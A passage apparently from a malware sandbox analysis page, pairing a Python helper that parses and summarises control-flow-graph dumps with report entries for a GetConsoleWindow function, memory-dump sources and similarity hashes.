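    current = None  # block that trailing annotation tokens belong to
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None
            i += 1
            continue
        if ID_RE.match(tok) and i + 1 < len(tokens):
            r = RANGE_RE.match(tokens[i + 1])
            if r:  # '<id> <start>[-<end>]' opens a new block
                start = int(r.group(1), 16)
                end = int(r.group(2), 16) if r.group(2) else start
                current = Block(int(tok), start, end)
                blocks[current.node_id] = current
                i += 2
                continue
        if current is None:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
        if tok == "call" and i + 1 < len(tokens):  # 'call f9d8f8' -> one annotation
            current.annotations.append(f"call {tokens[i + 1]}")
            i += 2
        else:  # bare API name such as GetConsoleWindow
            current.annotations.append(tok)
            i += 1
    return Cfg(blocks, edges)


def summarize(cfg: Cfg) -> dict:
    blocks = cfg.blocks.values()
    indeg = {n: 0 for n in cfg.blocks}
    outdeg = {n: 0 for n in cfg.blocks}
    for src, dst in cfg.edges:
        outdeg[src] = outdeg.get(src, 0) + 1
        indeg[dst] = indeg.get(dst, 0) + 1
    anns = [a for b in blocks for a in b.annotations]
    return {
        "blocks": len(cfg.blocks),
        "start": min(b.start for b in blocks),
        "end": max(b.end for b in blocks),
        "entry": sorted(n for n in cfg.blocks if indeg[n] == 0),   # no predecessors
        "exits": sorted(n for n in cfg.blocks if outdeg[n] == 0),  # no successors
        "calls": sorted({a.split()[1] for a in anns if a.startswith("call ")}),
        "apis": sorted({a for a in anns if not a.startswith("call ")}),
    }


def unreachable(cfg: Cfg) -> list:
    """Blocks that no path from an entry block reaches (dead or unconnected code)."""
    succ = {}
    for src, dst in cfg.edges:
        succ.setdefault(src, []).append(dst)
    seen, stack = set(), list(summarize(cfg)["entry"])
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(succ.get(n, []))
    return sorted(n for n in cfg.blocks if n not in seen)


# Copied from this report: the GetConsoleWindow function (three blocks).
CONSOLE_CFG = ("control_flow_graph 903 f90ce0-f90d54 GetConsoleWindow "
               "906 f90d5d-f90d82 903->906 907 f90d56-f90d5c 903->907 907->906")
# Three-block excerpt of the report's first dump, including one call site.
CALL_CFG = ("control_flow_graph 1072 f9ea44-f9ea75 1083 f9ea93-f9eabe "
            "1072->1083 1084 f9ea77-f9ea8b call f9d8f8 1072->1084 1084->1083")

if __name__ == "__main__":
    for name, dump in (("GetConsoleWindow", CONSOLE_CFG), ("excerpt", CALL_CFG)):
        cfg = parse_cfg(dump)
        s = summarize(cfg)
        print(f"{name}: {s['blocks']} blocks {s['start']:#x}-{s['end']:#x} "
              f"entry={s['entry']} exits={s['exits']} calls={s['calls']} "
              f"apis={s['apis']} unreachable={unreachable(cfg)}")
```

                                    Feeding the page's first dump to parse_cfg gives the block range and call targets stated in the summary above it; a non-empty unreachable() result on a dump usually means the plugin graphed a second entry point or left a block unconnected, which is worth a manual look before trusting the graph's edge set.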

                                    Control-flow Graph
                                    • Rendered graph omitted. Function at 0x00F90CE8, overlapping the function at 0x00F90CE0 (same GetConsoleWindow reference at 0x00F90D47), three blocks: 0x00F90CE8-0x00F90D54 (calls GetConsoleWindow) branches either to 0x00F90D56-0x00F90D5C or directly to 0x00F90D5D-0x00F90D82, where both paths rejoin.
                                    APIs
                                    • GetConsoleWindow.KERNELBASE ref: 00F90D47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2945720828.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f90000_kuEfaZxkiY.jbxd
                                    Similarity
                                    • API ID: ConsoleWindow
                                    • String ID:
                                    • API String ID: 2863861424-0
                                    • Opcode ID: f95dbff4e3215810e06dea6752744fe312ea29eb7891e8596dac3be918563507
                                    • Instruction ID: 30fe0e0657e7e3df8f8c58171675d337b3d58dfa79ae42123873937257e3a8d8
                                    • Opcode Fuzzy Hash: f95dbff4e3215810e06dea6752744fe312ea29eb7891e8596dac3be918563507
                                    • Instruction Fuzzy Hash: D21103B1D002498FDB20DFAAC4457DEFFF4AB88324F20842AC459A7250CB79A944CFA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2945720828.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f90000_kuEfaZxkiY.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Hbq
                                    • API String ID: 0-1245868
                                    • Opcode ID: 864c6d63a9aa21eb6b42f562e1316d31700dc84ea8761dc8077e0d0edf50bd01
                                    • Instruction ID: da5d14ec0e131bcf1ea59363c574c841b8fa3a816dddea065554fadc101ac4d4
                                    • Opcode Fuzzy Hash: 864c6d63a9aa21eb6b42f562e1316d31700dc84ea8761dc8077e0d0edf50bd01
                                    • Instruction Fuzzy Hash: E7D15B34B002458FDB14EB79D898A6EBBF6EF89350B148469E905DB3A5DF70DC02CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%